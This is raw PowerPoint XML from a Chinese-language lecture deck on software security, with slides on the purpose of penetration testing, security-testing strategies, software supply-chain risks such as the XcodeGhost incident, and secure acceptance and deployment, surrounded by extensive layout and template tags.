              <a:t>找出来的问题都是真实的，也是较为严重的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缺点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>只能到达有限的测试点，覆盖率较低</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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渗透测试流程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057525" y="1464310"/>
            <a:ext cx="6076950" cy="4600575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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渗透测试要点</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305685" y="1268095"/>
            <a:ext cx="6096000" cy="341503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测试目的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全性的评估，不是摧毁或破坏</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试人员</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>技术、知识和经验很重要</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>像“坏人”一样思考问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统备份和恢复措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>风险规避</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="4884420"/>
            <a:ext cx="7048500" cy="1228725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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灵活安排自己的“组合”</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矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127760" y="1716405"/>
            <a:ext cx="9936480" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1">
                <a:ln w="15875"/>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:hueMod val="80000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:alpha val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>必须完整的遵循</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1">
                <a:ln w="15875"/>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:hueMod val="80000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:alpha val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1">
                <a:ln w="15875"/>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:hueMod val="80000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:alpha val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>安全开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1">
                <a:ln w="15875"/>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:hueMod val="80000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:alpha val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1">
                <a:ln w="15875"/>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:hueMod val="80000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:alpha val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>过程吗？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1">
              <a:ln w="15875"/>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent1">
                      <a:hueMod val="80000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1">
                      <a:alpha val="100000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="0"/>
              </a:gradFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3064510"/>
            <a:ext cx="6096000" cy="258445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代码审核 + 体系结构风险评估</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基于风险的安全测试 + 渗透测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全需求分析 + 滥用案例开发</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码审核 + 渗透测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>体系结构风险分析 + 基于风险的测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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软件安全测试思路</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781300" y="2136775"/>
            <a:ext cx="6096000" cy="258445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充分了解软件安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设计、实现、部署三个环节同时着手</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>评估软件安全风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全性缺陷数据评估</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞植入法评估</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拥有高效的软件安全测试技术和工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交付</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软件供应链安全</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770" y="1726565"/>
            <a:ext cx="10599420" cy="383095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供应链安全概念</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目前软件安全开发生命周期中新的威胁，涉及到软件的代码编写、代码编译、软件分发、软件更新</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码编写：共享库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码编译：被污染的编译软件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件分发/更新：污染源头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>供应链安全应对策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全流程覆盖到引入的第三方代码中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可靠的编译软件获取方式--XcodeGhost事件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>官方渠道、发布验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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软件验收及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>部署</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917065" y="1929130"/>
            <a:ext cx="6096000" cy="299974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软件验收</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>正式的验收流程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全纳入到验收考虑中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全部署</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提供软件部署所需要的文档和工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件加固</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件安全配置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>06</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>案例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>分析</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transition/>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1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="01"/>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a*1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_1_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击此处添加目录项标题"/>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2_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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3_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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4_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_2"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>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3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="03"/>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a*1_3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击此处添加目录项标题"/>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4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="04"/>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a*1_4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
